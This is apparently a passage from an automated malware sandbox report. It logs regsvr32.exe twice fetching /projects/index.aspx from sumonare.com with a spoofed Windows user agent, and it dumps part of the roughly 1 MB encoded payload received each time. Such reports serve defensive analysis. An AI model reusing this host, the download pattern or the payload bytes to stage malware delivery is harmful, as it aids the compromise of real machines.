                Data Ascii: HebgLjrjiUW1aj/9lNTjrM4dfHgL5T7w3JEbaIFLtPmm8ddPHIe3gAsG5A4baKVlWC24ecr5908U57eAXdQkfPiRwlijqZ2tlNdNsiTHpa0d5MsR34ZIchhPmFpYwTSjOCattMkS5CzraNF3kH8riKJ2zPuL/HMPMMzp1elkMRuYPyuAgnbMhQk8RZzJw9QuWUHlRbbFhrCCROGtOdNMu45IwfPLaNKUJ02trZTU44Kspmg3XsZBPIv


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                3192.168.2.749704194.67.193.124437932C:\Windows\SysWOW64\regsvr32.exe
                TimestampBytes transferredDirectionData
                2024-09-28 01:22:13 UTC114OUTGET /projects/index.aspx HTTP/1.1
                User-Agent: Microsoft-WNS/11.0
                Host: sumonare.com
                Cache-Control: no-cache
                2024-09-28 01:22:13 UTC253INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:22:13 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                Last-Modified: Thu, 22 Aug 2024 19:01:47 GMT
                ETag: "f8302-6204a4a61cd40"
                Accept-Ranges: bytes
                Content-Length: 1016578
                Connection: close
                2024-09-28 01:22:13 UTC7939INData Raw: 4e 47 6a 65 4d 6c 4a 35 55 57 31 65 5a 6d 74 6c 79 73 64 72 54 73 78 5a 61 30 64 35 4d 6b 34 79 45 58 6c 52 62 56 70 6d 61 32 55 31 4f 47 74 4f 64 46 6c 72 52 33 6b 79 54 6a 4a 52 65 56 46 74 0d 0a 57 6d 5a 72 5a 54 55 34 61 30 35 30 57 57 74 48 61 54 4e 4f 4d 6c 39 6d 36 32 4e 61 30 6d 4b 6f 46 49 42 71 41 72 6c 34 50 79 38 51 51 57 35 43 49 78 59 32 48 7a 73 4c 53 77 5a 55 56 67 55 68 0d 0a 41 48 6b 4a 49 6c 6c 41 4f 31 78 78 45 44 39 4e 48 69 6b 34 52 56 68 58 44 79 74 61 56 47 5a 4e 58 54 4a 4f 4d 6c 46 35 55 57 33 6a 33 6f 31 4e 79 4f 48 6a 4e 59 6d 41 34 7a 79 45 36 38 5a 4a 0d 0a 66 39 4c 61 46 36 79 2f 34 78 34 62 6b 2b 59 30 4b 49 44 6a 50 49 4a 71 77 6b 69 38 6f 4e 6b 57 6f 54 37 67 48 39 37 68 34 7a 56 61 38 75 63 39 6b 75 76 47 53 61 6f 68 33
                Data Ascii: NGjeMlJ5UW1eZmtlysdrTsxZa0d5Mk4yEXlRbVpma2U1OGtOdFlrR3kyTjJReVFtWmZrZTU4a050WWtHaTNOMl9m62Na0mKoFIBqArl4Py8QQW5CIxY2HzsLSwZUVgUhAHkJIllAO1xxED9NHik4RVhXDytaVGZNXTJOMlF5UW3j3o1NyOHjNYmA4zyE68ZJf9LaF6y/4x4bk+Y0KIDjPIJqwki8oNkWoT7gH97h4zVa8uc9kuvGSaoh3
                2024-09-28 01:22:13 UTC16384INData Raw: 69 54 2f 30 59 62 38 34 34 4f 73 56 6e 72 62 34 54 61 56 74 6d 61 32 57 2b 66 5a 65 4a 4e 46 46 71 52 33 6b 79 78 58 2b 74 76 6c 44 52 0d 0a 37 6d 39 37 37 6d 41 30 34 68 75 63 30 69 35 50 38 48 65 71 75 52 79 46 30 71 78 57 37 79 61 4a 76 6d 32 48 78 79 47 68 34 41 4b 52 75 77 76 53 32 6a 53 31 35 42 65 36 34 44 44 56 73 32 6e 48 0d 0a 4d 59 48 67 43 71 57 35 58 37 73 45 6a 64 6f 6f 6f 71 46 72 6f 61 4d 78 65 38 55 35 6f 61 78 47 55 61 56 48 49 74 6f 73 71 65 59 66 6b 75 49 6e 4d 62 73 57 75 6e 51 73 59 6f 41 38 77 6b 34 79 0d 0a 55 58 6d 36 5a 4e 45 72 6e 32 5a 34 34 4f 49 44 68 4e 49 2b 76 2f 4a 33 76 72 73 54 63 64 6f 6f 70 75 32 4f 4f 50 63 77 61 34 49 68 30 6f 66 45 6c 53 62 48 66 36 33 79 46 4a 47 63 5a 6d 74 57 0d 0a 2f 4c 4d 2b 73 76 65 62 59 38
                Data Ascii: iT/0Yb844OsVnrb4TaVtma2W+fZeJNFFqR3kyxX+tvlDR7m977mA04huc0i5P8HequRyF0qxW7yaJvm2HxyGh4AKRuwvS2jS15Be64DDVs2nHMYHgCqW5X7sEjdoooqFroaMxe8U5oaxGUaVHItosqeYfkuInMbsWunQsYoA8wk4yUXm6ZNErn2Z44OIDhNI+v/J3vrsTcdoopu2OOPcwa4Ih0ofElSbHf63yFJGcZmtW/LM+svebY8
                2024-09-28 01:22:13 UTC16384INData Raw: 4c 6f 6e 44 73 61 30 35 30 57 65 41 43 57 62 73 4c 31 74 6f 30 54 65 51 58 6a 75 41 77 0d 0a 33 62 45 2b 69 76 38 63 6a 38 34 38 2b 73 4e 2f 6c 66 41 63 73 64 45 7a 69 7a 65 2b 64 62 65 6d 77 47 56 71 52 35 41 6c 73 63 32 75 38 68 52 6c 30 53 74 33 37 6d 41 59 34 6b 62 39 43 57 2f 4d 0d 0a 50 44 72 46 31 77 79 36 6e 61 47 57 71 71 65 70 2b 66 53 6e 67 69 48 53 68 78 71 36 2f 6f 4c 2b 6e 62 57 64 6f 5a 61 71 70 36 6c 67 73 34 63 66 6e 31 44 67 41 6e 47 78 6a 69 4c 59 50 46 6e 6d 0d 0a 46 32 35 51 4b 44 6c 4d 58 4d 55 68 55 65 49 53 68 62 6b 44 7a 72 6b 43 58 47 35 61 37 53 36 5a 4f 6f 35 6a 48 2f 38 55 6c 38 53 34 4f 71 5a 72 4e 48 70 52 58 6f 6a 6c 69 57 52 42 4e 67 46 65 0d 0a 2f 78 79 58 46 35 47 77 67 6a 52 52 2b 70 56 6c 73 64 37 67 67 47 6a 37 70 34
                Data Ascii: LonDsa050WeACWbsL1to0TeQXjuAw3bE+iv8cj848+sN/lfAcsdEzize+dbemwGVqR5Alsc2u8hRl0St37mAY4kb9CW/MPDrF1wy6naGWqqep+fSngiHShxq6/oL+nbWdoZaqp6lgs4cfn1DgAnGxjiLYPFnmF25QKDlMXMUhUeIShbkDzrkCXG5a7S6ZOo5jH/8Ul8S4OqZrNHpRXojliWRBNgFe/xyXF5GwgjRR+pVlsd7ggGj7p4
                2024-09-28 01:22:13 UTC16384INData Raw: 61 34 4f 71 59 6c 4a 72 64 39 33 74 50 0d 0a 64 4c 4b 34 7a 50 51 69 73 63 32 75 38 73 52 35 70 5a 6d 55 37 4c 68 77 6c 62 47 4c 30 50 34 4c 68 38 32 78 75 64 51 78 72 35 4b 6c 37 65 59 70 79 38 65 55 78 7a 46 56 34 67 70 70 39 51 76 71 0d 0a 55 58 6c 52 62 62 4f 64 61 32 55 31 74 66 35 75 69 71 61 55 7a 69 79 6d 78 58 66 46 38 4e 52 56 70 5a 6d 55 37 6e 69 73 36 44 64 67 56 68 31 4c 76 72 64 79 7a 61 36 47 55 47 31 61 5a 6f 42 76 0d 0a 38 72 31 58 73 59 75 6d 61 30 64 35 4d 73 53 6e 62 59 61 75 6b 74 49 7a 67 32 71 44 66 59 50 4c 74 43 31 38 7a 44 53 6d 78 53 50 59 37 50 32 54 70 5a 6e 67 34 4a 6e 47 6c 4c 48 39 33 46 4f 34 0d 0a 68 73 33 46 76 32 6d 47 72 70 4c 54 36 38 4f 62 79 73 64 59 6e 4c 57 37 61 30 54 73 6d 72 44 4e 72 76 44 45 79 61 53 5a 6c 4f
                Data Ascii: a4OqYlJrd93tPdLK4zPQisc2u8sR5pZmU7LhwlbGL0P4Lh82xudQxr5Kl7eYpy8eUxzFV4gpp9QvqUXlRbbOda2U1tf5uiqaUziymxXfF8NRVpZmU7nis6DdgVh1Lvrdyza6GUG1aZoBv8r1XsYuma0d5MsSnbYauktIzg2qDfYPLtC18zDSmxSPY7P2TpZng4JnGlLH93FO4hs3Fv2mGrpLT68ObysdYnLW7a0TsmrDNrvDEyaSZlO
                2024-09-28 01:22:14 UTC16384INData Raw: 62 73 44 67 74 77 73 6f 7a 2f 52 49 34 4d 31 76 6e 57 76 70 70 67 6b 6c 4c 67 54 4d 73 4e 2f 2b 53 69 35 6e 4e 4b 5a 6c 4f 62 78 4d 47 54 34 70 4e 79 35 4d 6d 35 61 57 41 35 52 65 54 6c 64 0d 0a 7a 57 39 37 44 61 57 56 59 6c 36 63 4f 54 42 41 65 62 47 4b 50 70 59 38 6b 57 31 61 5a 6d 76 6f 65 4a 54 69 41 35 44 53 50 71 50 79 4d 4d 64 33 37 66 49 63 69 64 45 7a 71 2b 77 6b 73 79 37 79 0d 0a 2f 52 7a 54 7a 44 53 4b 78 33 2f 6c 76 68 53 52 70 5a 6d 55 6d 72 68 31 77 36 59 73 67 47 74 48 38 6e 66 36 75 52 79 4e 4e 65 52 58 5a 6d 74 6c 4e 62 4f 4f 45 37 65 56 70 34 75 31 2f 6f 4c 2b 0d 0a 42 50 4b 39 37 72 59 69 35 69 44 4b 73 53 36 69 48 6c 6a 6d 43 6f 5a 6a 70 6d 76 36 65 31 48 75 6e 6d 37 69 49 4e 47 31 50 76 4c 39 44 4a 2f 4b 50 4e 37 48 64 37 6e 79 48 49
                Data Ascii: bsDgtwsoz/RI4M1vnWvppgklLgTMsN/+Si5nNKZlObxMGT4pNy5Mm5aWA5ReTldzW97DaWVYl6cOTBAebGKPpY8kW1aZmvoeJTiA5DSPqPyMMd37fIcidEzq+wksy7y/RzTzDSKx3/lvhSRpZmUmrh1w6YsgGtH8nf6uRyNNeRXZmtlNbOOE7eVp4u1/oL+BPK97rYi5iDKsS6iHljmCoZjpmv6e1Hunm7iING1PvL9DJ/KPN7Hd7nyHI
                2024-09-28 01:22:14 UTC16384INData Raw: 4b 61 55 75 50 52 33 70 37 76 55 46 61 36 53 70 65 30 6d 62 62 36 74 42 37 47 4c 70 75 46 46 38 54 50 44 76 7a 6d 47 72 70 4c 54 36 77 2b 61 0d 0a 79 73 66 67 47 33 7a 53 37 69 4f 47 7a 62 47 35 57 66 41 62 61 5a 30 6a 6c 35 72 4b 78 35 54 44 4f 5a 57 44 5a 76 73 77 54 6a 33 6e 4c 4a 30 2f 31 79 75 2f 6a 54 48 69 61 55 37 2f 48 47 4f 75 0d 0a 6b 7a 5a 4f 4d 74 6f 38 6f 65 36 61 59 75 4c 67 56 63 65 55 73 63 31 64 61 30 64 35 57 5a 2f 4e 32 76 77 78 6b 71 57 5a 61 44 55 78 73 66 34 53 69 36 61 55 7a 50 52 75 73 63 32 75 2b 6d 68 74 0d 0a 4c 77 53 74 49 4e 30 34 72 4d 73 67 70 70 53 34 65 54 4a 4f 4d 74 77 73 75 65 54 50 50 70 53 61 79 72 4d 75 52 76 2f 55 4d 37 69 47 7a 63 51 6a 32 57 6e 63 36 41 36 5a 6c 4a 71 38 76 54 75 78 0d 0a 69 36 62 67 43 6e 47 35
                Data Ascii: KaUuPR3p7vUFa6Spe0mbb6tB7GLpuFF8TPDvzmGrpLT6w+aysfgG3zS7iOGzbG5WfAbaZ0jl5rKx5TDOZWDZvswTj3nLJ0/1yu/jTHiaU7/HGOukzZOMto8oe6aYuLgVceUsc1da0d5WZ/N2vwxkqWZaDUxsf4Si6aUzPRusc2u+mhtLwStIN04rMsgppS4eTJOMtwsueTPPpSayrMuRv/UM7iGzcQj2Wnc6A6ZlJq8vTuxi6bgCnG5
                2024-09-28 01:22:14 UTC16384INData Raw: 59 46 76 54 6e 52 5a 41 4a 61 47 75 51 76 32 55 69 6c 56 35 41 2b 6d 34 43 6a 31 73 33 72 48 0d 0a 49 65 58 67 41 73 57 79 64 6a 41 6b 63 4a 59 6f 67 6d 64 72 5a 54 58 54 62 49 6b 78 67 57 74 48 65 54 4c 45 66 34 6e 78 48 4a 39 56 30 44 36 58 73 4f 6f 65 45 66 38 63 6c 38 53 35 4e 73 64 33 0d 0a 36 63 42 56 62 56 70 6d 41 4c 54 4b 73 79 37 32 64 77 6c 76 7a 69 79 47 78 58 2f 6c 38 6b 44 6b 44 39 62 67 49 49 57 34 55 30 38 42 55 4b 77 43 72 54 4e 4f 4d 6c 47 53 56 71 6f 66 73 6d 74 6c 0d 0a 4e 54 6a 68 41 36 44 52 4a 72 5a 32 68 42 76 44 31 4b 73 6b 65 6a 4a 6e 65 57 55 31 55 46 76 5a 66 55 6b 44 37 38 6f 37 58 74 71 34 68 46 64 74 32 61 4a 6e 37 6e 6a 45 36 49 39 77 30 43 62 72 0d 0a 77 7a 5a 4f 4d 6c 45 53 6b 35 4c 52 4b 38 64 6d 64 44 7a 69 43 39 7a 53
                Data Ascii: YFvTnRZAJaGuQv2UilV5A+m4Cj1s3rHIeXgAsWydjAkcJYogmdrZTXTbIkxgWtHeTLEf4nxHJ9V0D6XsOoeEf8cl8S5Nsd36cBVbVpmALTKsy72dwlvziyGxX/l8kDkD9bgIIW4U08BUKwCrTNOMlGSVqofsmtlNTjhA6DRJrZ2hBvD1KskejJneWU1UFvZfUkD78o7Xtq4hFdt2aJn7njE6I9w0CbrwzZOMlESk5LRK8dmdDziC9zS
                2024-09-28 01:22:14 UTC16384INData Raw: 4a 6d 55 6f 33 44 45 66 4d 55 35 71 65 69 47 0d 0a 4f 62 6c 66 75 38 51 74 72 4a 4b 6c 37 53 70 68 76 4c 30 7a 73 34 75 6d 34 41 35 78 75 38 4e 75 72 49 61 75 34 4d 38 79 6c 70 72 4b 73 66 34 61 69 71 61 55 7a 50 78 71 73 4d 32 75 4b 64 72 67 0d 0a 44 70 69 55 6d 6d 52 53 44 73 50 68 66 5a 4b 34 68 6d 43 6d 72 77 70 37 55 65 36 65 64 75 4c 67 5a 63 61 55 73 66 2f 63 4f 37 6d 47 7a 63 65 33 46 59 65 75 6b 70 77 6a 6c 33 32 34 74 66 4f 30 0d 0a 69 36 59 36 7a 44 54 43 7a 66 4e 68 6b 55 4d 53 58 6d 62 69 34 48 6e 47 6c 4c 48 2f 7a 43 65 35 68 73 33 48 70 78 47 48 72 70 4b 63 49 35 64 38 76 6e 32 62 7a 62 51 5a 34 45 2f 77 76 37 72 4f 0d 0a 72 6f 62 61 50 56 37 76 2f 70 33 4a 78 35 54 46 4e 46 48 69 77 6f 58 4f 73 63 33 63 39 4b 57 52 70 5a 6e 69 36 48 33 47
                Data Ascii: JmUo3DEfMU5qeiGOblfu8QtrJKl7SphvL0zs4um4A5xu8NurIau4M8ylprKsf4aiqaUzPxqsM2uKdrgDpiUmmRSDsPhfZK4hmCmrwp7Ue6eduLgZcaUsf/cO7mGzce3FYeukpwjl324tfO0i6Y6zDTCzfNhkUMSXmbi4HnGlLH/zCe5hs3HpxGHrpKcI5d8vn2bzbQZ4E/wv7rOrobaPV7v/p3Jx5TFNFHiwoXOsc3c9KWRpZni6H3G
                2024-09-28 01:22:14 UTC16384INData Raw: 0a 42 50 4b 39 37 72 5a 79 34 69 6a 4a 73 79 36 79 2f 52 79 66 7a 44 54 47 78 33 2b 70 38 67 53 56 6e 57 52 72 5a 54 55 34 34 41 75 4d 6e 69 74 44 65 54 4a 4f 4d 74 6f 30 58 65 51 58 6c 75 41 77 0d 0a 50 62 45 2b 6f 76 38 63 6d 78 66 79 66 36 4a 6a 32 6a 53 74 68 66 61 45 6c 5a 71 2b 66 5a 66 46 6b 51 53 70 54 33 6e 2b 67 76 34 45 38 72 33 75 74 6e 72 69 4b 4d 47 7a 4c 72 72 39 48 49 50 4b 0d 0a 4e 4d 33 48 66 37 33 79 42 49 46 56 30 47 6e 74 63 4d 44 67 41 35 7a 51 4a 71 50 79 5a 36 71 37 42 49 6e 61 4b 4b 71 68 61 32 55 31 4f 47 76 46 4f 61 6d 73 42 6e 30 79 54 6a 4a 52 38 68 79 5a 0d 0a 73 6f 33 48 5a 44 57 7a 4c 72 72 2f 76 44 61 45 74 66 36 43 2f 67 54 79 76 65 36 32 65 75 49 6f 77 66 38 75 6f 6e 52 5a 61 30 66 79 64 30 5a 69 33 44 53 31 50 4c 4a 56
                Data Ascii: BPK97rZy4ijJsy6y/RyfzDTGx3+p8gSVnWRrZTU44AuMnitDeTJOMto0XeQXluAwPbE+ov8cmxfyf6Jj2jSthfaElZq+fZfFkQSpT3n+gv4E8r3utnriKMGzLrr9HIPKNM3Hf73yBIFV0GntcMDgA5zQJqPyZ6q7BInaKKqha2U1OGvFOamsBn0yTjJR8hyZso3HZDWzLrr/vDaEtf6C/gTyve62euIowf8uonRZa0fyd0Zi3DS1PLJV
                2024-09-28 01:22:14 UTC16384INData Raw: 48 65 62 67 4c 6a 72 6a 69 55 57 31 61 6a 2f 39 6c 4e 54 6a 72 4d 34 64 66 48 67 4c 35 54 37 77 33 4a 45 62 61 49 46 4c 74 50 6d 6d 38 64 64 50 48 0d 0a 49 65 33 67 41 73 47 35 41 34 62 61 4b 56 6c 57 43 32 34 65 63 72 35 39 30 38 55 35 37 65 41 58 64 51 6b 66 50 69 52 77 6c 69 6a 71 5a 32 74 6c 4e 64 4e 73 69 54 48 70 61 30 64 35 4d 73 52 33 0d 0a 34 5a 49 63 68 68 50 6d 46 70 59 77 54 53 6a 4f 43 61 74 74 4d 6b 53 35 43 7a 72 61 4e 46 33 6b 48 38 72 69 4b 4a 32 7a 50 75 4c 2f 48 4d 50 4d 4d 7a 70 31 65 6c 6b 4d 52 75 59 50 79 75 41 67 0d 0a 6e 62 4d 68 51 6b 38 52 5a 7a 4a 77 39 51 75 57 55 48 6c 52 62 62 46 68 72 43 43 52 4f 47 74 4f 64 4e 4d 75 34 35 49 77 66 50 4c 61 4e 4b 55 4a 30 32 74 72 5a 54 55 34 34 4b 73 70 6d 67 33 58 0d 0a 73 5a 42 50 49 76
                Data Ascii: HebgLjrjiUW1aj/9lNTjrM4dfHgL5T7w3JEbaIFLtPmm8ddPHIe3gAsG5A4baKVlWC24ecr5908U57eAXdQkfPiRwlijqZ2tlNdNsiTHpa0d5MsR34ZIchhPmFpYwTSjOCattMkS5CzraNF3kH8riKJ2zPuL/HMPMMzp1elkMRuYPyuAgnbMhQk8RZzJw9QuWUHlRbbFhrCCROGtOdNMu45IwfPLaNKUJ02trZTU44Kspmg3XsZBPIv


                Session IDSource IPSource PortDestination IPDestination Port
                4192.168.2.749770194.67.193.12443
                TimestampBytes transferredDirectionData
                2024-09-28 01:23:15 UTC114OUTGET /projects/index.aspx HTTP/1.1
                User-Agent: Microsoft-WNS/11.0
                Host: sumonare.com
                Cache-Control: no-cache
                2024-09-28 01:23:15 UTC253INHTTP/1.1 200 OK
                Date: Sat, 28 Sep 2024 01:23:15 GMT
                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                Last-Modified: Thu, 22 Aug 2024 19:01:47 GMT
                ETag: "f8302-6204a4a61cd40"
                Accept-Ranges: bytes
                Content-Length: 1016578
                Connection: close
                2024-09-28 01:23:15 UTC7939INData Raw: 4e 47 6a 65 4d 6c 4a 35 55 57 31 65 5a 6d 74 6c 79 73 64 72 54 73 78 5a 61 30 64 35 4d 6b 34 79 45 58 6c 52 62 56 70 6d 61 32 55 31 4f 47 74 4f 64 46 6c 72 52 33 6b 79 54 6a 4a 52 65 56 46 74 0d 0a 57 6d 5a 72 5a 54 55 34 61 30 35 30 57 57 74 48 61 54 4e 4f 4d 6c 39 6d 36 32 4e 61 30 6d 4b 6f 46 49 42 71 41 72 6c 34 50 79 38 51 51 57 35 43 49 78 59 32 48 7a 73 4c 53 77 5a 55 56 67 55 68 0d 0a 41 48 6b 4a 49 6c 6c 41 4f 31 78 78 45 44 39 4e 48 69 6b 34 52 56 68 58 44 79 74 61 56 47 5a 4e 58 54 4a 4f 4d 6c 46 35 55 57 33 6a 33 6f 31 4e 79 4f 48 6a 4e 59 6d 41 34 7a 79 45 36 38 5a 4a 0d 0a 66 39 4c 61 46 36 79 2f 34 78 34 62 6b 2b 59 30 4b 49 44 6a 50 49 4a 71 77 6b 69 38 6f 4e 6b 57 6f 54 37 67 48 39 37 68 34 7a 56 61 38 75 63 39 6b 75 76 47 53 61 6f 68 33
                Data Ascii: NGjeMlJ5UW1eZmtlysdrTsxZa0d5Mk4yEXlRbVpma2U1OGtOdFlrR3kyTjJReVFtWmZrZTU4a050WWtHaTNOMl9m62Na0mKoFIBqArl4Py8QQW5CIxY2HzsLSwZUVgUhAHkJIllAO1xxED9NHik4RVhXDytaVGZNXTJOMlF5UW3j3o1NyOHjNYmA4zyE68ZJf9LaF6y/4x4bk+Y0KIDjPIJqwki8oNkWoT7gH97h4zVa8uc9kuvGSaoh3
                2024-09-28 01:23:15 UTC16384INData Raw: 69 54 2f 30 59 62 38 34 34 4f 73 56 6e 72 62 34 54 61 56 74 6d 61 32 57 2b 66 5a 65 4a 4e 46 46 71 52 33 6b 79 78 58 2b 74 76 6c 44 52 0d 0a 37 6d 39 37 37 6d 41 30 34 68 75 63 30 69 35 50 38 48 65 71 75 52 79 46 30 71 78 57 37 79 61 4a 76 6d 32 48 78 79 47 68 34 41 4b 52 75 77 76 53 32 6a 53 31 35 42 65 36 34 44 44 56 73 32 6e 48 0d 0a 4d 59 48 67 43 71 57 35 58 37 73 45 6a 64 6f 6f 6f 71 46 72 6f 61 4d 78 65 38 55 35 6f 61 78 47 55 61 56 48 49 74 6f 73 71 65 59 66 6b 75 49 6e 4d 62 73 57 75 6e 51 73 59 6f 41 38 77 6b 34 79 0d 0a 55 58 6d 36 5a 4e 45 72 6e 32 5a 34 34 4f 49 44 68 4e 49 2b 76 2f 4a 33 76 72 73 54 63 64 6f 6f 70 75 32 4f 4f 50 63 77 61 34 49 68 30 6f 66 45 6c 53 62 48 66 36 33 79 46 4a 47 63 5a 6d 74 57 0d 0a 2f 4c 4d 2b 73 76 65 62 59 38
                Data Ascii: iT/0Yb844OsVnrb4TaVtma2W+fZeJNFFqR3kyxX+tvlDR7m977mA04huc0i5P8HequRyF0qxW7yaJvm2HxyGh4AKRuwvS2jS15Be64DDVs2nHMYHgCqW5X7sEjdoooqFroaMxe8U5oaxGUaVHItosqeYfkuInMbsWunQsYoA8wk4yUXm6ZNErn2Z44OIDhNI+v/J3vrsTcdoopu2OOPcwa4Ih0ofElSbHf63yFJGcZmtW/LM+svebY8
                2024-09-28 01:23:15 UTC16384INData Raw: 4c 6f 6e 44 73 61 30 35 30 57 65 41 43 57 62 73 4c 31 74 6f 30 54 65 51 58 6a 75 41 77 0d 0a 33 62 45 2b 69 76 38 63 6a 38 34 38 2b 73 4e 2f 6c 66 41 63 73 64 45 7a 69 7a 65 2b 64 62 65 6d 77 47 56 71 52 35 41 6c 73 63 32 75 38 68 52 6c 30 53 74 33 37 6d 41 59 34 6b 62 39 43 57 2f 4d 0d 0a 50 44 72 46 31 77 79 36 6e 61 47 57 71 71 65 70 2b 66 53 6e 67 69 48 53 68 78 71 36 2f 6f 4c 2b 6e 62 57 64 6f 5a 61 71 70 36 6c 67 73 34 63 66 6e 31 44 67 41 6e 47 78 6a 69 4c 59 50 46 6e 6d 0d 0a 46 32 35 51 4b 44 6c 4d 58 4d 55 68 55 65 49 53 68 62 6b 44 7a 72 6b 43 58 47 35 61 37 53 36 5a 4f 6f 35 6a 48 2f 38 55 6c 38 53 34 4f 71 5a 72 4e 48 70 52 58 6f 6a 6c 69 57 52 42 4e 67 46 65 0d 0a 2f 78 79 58 46 35 47 77 67 6a 52 52 2b 70 56 6c 73 64 37 67 67 47 6a 37 70 34
                Data Ascii: LonDsa050WeACWbsL1to0TeQXjuAw3bE+iv8cj848+sN/lfAcsdEzize+dbemwGVqR5Alsc2u8hRl0St37mAY4kb9CW/MPDrF1wy6naGWqqep+fSngiHShxq6/oL+nbWdoZaqp6lgs4cfn1DgAnGxjiLYPFnmF25QKDlMXMUhUeIShbkDzrkCXG5a7S6ZOo5jH/8Ul8S4OqZrNHpRXojliWRBNgFe/xyXF5GwgjRR+pVlsd7ggGj7p4
                2024-09-28 01:23:15 UTC16384INData Raw: 61 34 4f 71 59 6c 4a 72 64 39 33 74 50 0d 0a 64 4c 4b 34 7a 50 51 69 73 63 32 75 38 73 52 35 70 5a 6d 55 37 4c 68 77 6c 62 47 4c 30 50 34 4c 68 38 32 78 75 64 51 78 72 35 4b 6c 37 65 59 70 79 38 65 55 78 7a 46 56 34 67 70 70 39 51 76 71 0d 0a 55 58 6c 52 62 62 4f 64 61 32 55 31 74 66 35 75 69 71 61 55 7a 69 79 6d 78 58 66 46 38 4e 52 56 70 5a 6d 55 37 6e 69 73 36 44 64 67 56 68 31 4c 76 72 64 79 7a 61 36 47 55 47 31 61 5a 6f 42 76 0d 0a 38 72 31 58 73 59 75 6d 61 30 64 35 4d 73 53 6e 62 59 61 75 6b 74 49 7a 67 32 71 44 66 59 50 4c 74 43 31 38 7a 44 53 6d 78 53 50 59 37 50 32 54 70 5a 6e 67 34 4a 6e 47 6c 4c 48 39 33 46 4f 34 0d 0a 68 73 33 46 76 32 6d 47 72 70 4c 54 36 38 4f 62 79 73 64 59 6e 4c 57 37 61 30 54 73 6d 72 44 4e 72 76 44 45 79 61 53 5a 6c 4f
                Data Ascii: a4OqYlJrd93tPdLK4zPQisc2u8sR5pZmU7LhwlbGL0P4Lh82xudQxr5Kl7eYpy8eUxzFV4gpp9QvqUXlRbbOda2U1tf5uiqaUziymxXfF8NRVpZmU7nis6DdgVh1Lvrdyza6GUG1aZoBv8r1XsYuma0d5MsSnbYauktIzg2qDfYPLtC18zDSmxSPY7P2TpZng4JnGlLH93FO4hs3Fv2mGrpLT68ObysdYnLW7a0TsmrDNrvDEyaSZlO
                2024-09-28 01:23:15 UTC16384INData Raw: 62 73 44 67 74 77 73 6f 7a 2f 52 49 34 4d 31 76 6e 57 76 70 70 67 6b 6c 4c 67 54 4d 73 4e 2f 2b 53 69 35 6e 4e 4b 5a 6c 4f 62 78 4d 47 54 34 70 4e 79 35 4d 6d 35 61 57 41 35 52 65 54 6c 64 0d 0a 7a 57 39 37 44 61 57 56 59 6c 36 63 4f 54 42 41 65 62 47 4b 50 70 59 38 6b 57 31 61 5a 6d 76 6f 65 4a 54 69 41 35 44 53 50 71 50 79 4d 4d 64 33 37 66 49 63 69 64 45 7a 71 2b 77 6b 73 79 37 79 0d 0a 2f 52 7a 54 7a 44 53 4b 78 33 2f 6c 76 68 53 52 70 5a 6d 55 6d 72 68 31 77 36 59 73 67 47 74 48 38 6e 66 36 75 52 79 4e 4e 65 52 58 5a 6d 74 6c 4e 62 4f 4f 45 37 65 56 70 34 75 31 2f 6f 4c 2b 0d 0a 42 50 4b 39 37 72 59 69 35 69 44 4b 73 53 36 69 48 6c 6a 6d 43 6f 5a 6a 70 6d 76 36 65 31 48 75 6e 6d 37 69 49 4e 47 31 50 76 4c 39 44 4a 2f 4b 50 4e 37 48 64 37 6e 79 48 49
                Data Ascii: bsDgtwsoz/RI4M1vnWvppgklLgTMsN/+Si5nNKZlObxMGT4pNy5Mm5aWA5ReTldzW97DaWVYl6cOTBAebGKPpY8kW1aZmvoeJTiA5DSPqPyMMd37fIcidEzq+wksy7y/RzTzDSKx3/lvhSRpZmUmrh1w6YsgGtH8nf6uRyNNeRXZmtlNbOOE7eVp4u1/oL+BPK97rYi5iDKsS6iHljmCoZjpmv6e1Hunm7iING1PvL9DJ/KPN7Hd7nyHI
                2024-09-28 01:23:15 UTC16384INData Raw: 4b 61 55 75 50 52 33 70 37 76 55 46 61 36 53 70 65 30 6d 62 62 36 74 42 37 47 4c 70 75 46 46 38 54 50 44 76 7a 6d 47 72 70 4c 54 36 77 2b 61 0d 0a 79 73 66 67 47 33 7a 53 37 69 4f 47 7a 62 47 35 57 66 41 62 61 5a 30 6a 6c 35 72 4b 78 35 54 44 4f 5a 57 44 5a 76 73 77 54 6a 33 6e 4c 4a 30 2f 31 79 75 2f 6a 54 48 69 61 55 37 2f 48 47 4f 75 0d 0a 6b 7a 5a 4f 4d 74 6f 38 6f 65 36 61 59 75 4c 67 56 63 65 55 73 63 31 64 61 30 64 35 57 5a 2f 4e 32 76 77 78 6b 71 57 5a 61 44 55 78 73 66 34 53 69 36 61 55 7a 50 52 75 73 63 32 75 2b 6d 68 74 0d 0a 4c 77 53 74 49 4e 30 34 72 4d 73 67 70 70 53 34 65 54 4a 4f 4d 74 77 73 75 65 54 50 50 70 53 61 79 72 4d 75 52 76 2f 55 4d 37 69 47 7a 63 51 6a 32 57 6e 63 36 41 36 5a 6c 4a 71 38 76 54 75 78 0d 0a 69 36 62 67 43 6e 47 35
                Data Ascii: KaUuPR3p7vUFa6Spe0mbb6tB7GLpuFF8TPDvzmGrpLT6w+aysfgG3zS7iOGzbG5WfAbaZ0jl5rKx5TDOZWDZvswTj3nLJ0/1yu/jTHiaU7/HGOukzZOMto8oe6aYuLgVceUsc1da0d5WZ/N2vwxkqWZaDUxsf4Si6aUzPRusc2u+mhtLwStIN04rMsgppS4eTJOMtwsueTPPpSayrMuRv/UM7iGzcQj2Wnc6A6ZlJq8vTuxi6bgCnG5
